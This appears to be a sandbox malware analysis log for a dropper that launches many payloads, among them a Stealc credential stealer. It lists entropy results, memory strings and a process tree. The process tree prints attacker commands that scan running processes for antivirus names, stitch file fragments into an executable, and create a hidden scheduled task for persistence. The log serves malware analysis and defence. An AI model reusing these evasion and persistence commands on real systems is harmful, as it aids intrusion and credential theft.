Source: 13a34faa3c.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.997227307561308
Source: file.exe	Static PE information: Section: iknsbfcc ZLIB complexity 0.9941699160167966
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.997227307561308
Source: axplong.exe.0.dr	Static PE information: Section: iknsbfcc ZLIB complexity 0.9941699160167966
Source: 03564c0e08.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: random[1].exe0.7.dr	Static PE information: Section: ZLIB complexity 0.9982672903605015
Source: d0d468f327.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9982672903605015
Source: zxcv[1].exe.7.dr	Static PE information: Section: .data ZLIB complexity 0.9967484533183352
Source: zxcv.exe.7.dr	Static PE information: Section: .data ZLIB complexity 0.9967484533183352
Source: gold[1].exe.7.dr	Static PE information: Section: ZLIB complexity 0.9907007662397073
Source: gold[1].exe.7.dr	Static PE information: Section: ZLIB complexity 0.9909895833333333
Source: gold.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9907007662397073
Source: gold.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9909895833333333
Source: myrdx[1].exe.7.dr	Static PE information: Section: .data ZLIB complexity 0.9898304977786753
Source: myrdx.exe.7.dr	Static PE information: Section: .data ZLIB complexity 0.9898304977786753
Source: random[1].exe1.7.dr	Static PE information: Section: hbhagroj ZLIB complexity 0.9947431723085042
Source: 4ad48d7d65.exe.7.dr	Static PE information: Section: hbhagroj ZLIB complexity 0.9947431723085042
Source: random[1].exe2.7.dr	Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: 25e6c25320.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9980285070532915
Source: 84d15ff2c9.exe.7.dr	Static PE information: Section: hbhagroj ZLIB complexity 0.9947431723085042

Source: axplong.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@78/96@0/12

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_6BB07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

14_2_6BB07030

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_00CB8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

14_2_00CB8680

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 14_2_00CB3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

14_2_00CB3720

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\zxcv[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4196
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6128

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat

Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: Window1	8_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: static.lib	8_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: static.lib	8_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: static.lib	8_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: Window1	9_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: static.lib	9_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: static.lib	9_2_002457B4
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Command line argument: static.lib	9_2_002457B4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp, stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp, stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp, stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp, stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp, stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 0000000E.00000002.2928542636.000000006BCDF000.00000002.00000001.01000000.00000016.sdmp, stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 0000000E.00000003.2763858747.0000000020FB9000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000003.2774845316.0000000020FAD000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3053254646.000000000304E000.00000004.00000800.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3133994718.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3124671828.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3185640184.0000000005B64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 0000000E.00000002.2918937139.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 0000000E.00000002.2904779763.000000001AEFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	ReversingLabs: Detection: 55%
Source: file.exe	Virustotal: Detection: 57%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 312
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Roaming\ofHIebp8us.exe "C:\Users\user\AppData\Roaming\ofHIebp8us.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe "C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe "C:\Users\user\AppData\Local\Temp\1000474001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe "C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe"
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 260
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000802001\1.exe "C:\Users\user\AppData\Local\Temp\1000802001\1.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe "C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe "C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe "C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe "C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe"
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\tasklist.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe "C:\Users\user\AppData\Local\Temp\1000474001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe "C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000802001\1.exe "C:\Users\user\AppData\Local\Temp\1000802001\1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe "C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe "C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe "C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe "C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Roaming\ofHIebp8us.exe "C:\Users\user\AppData\Roaming\ofHIebp8us.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe	Process created: C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe "C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000474001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe "C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe"
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1000802001\1.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
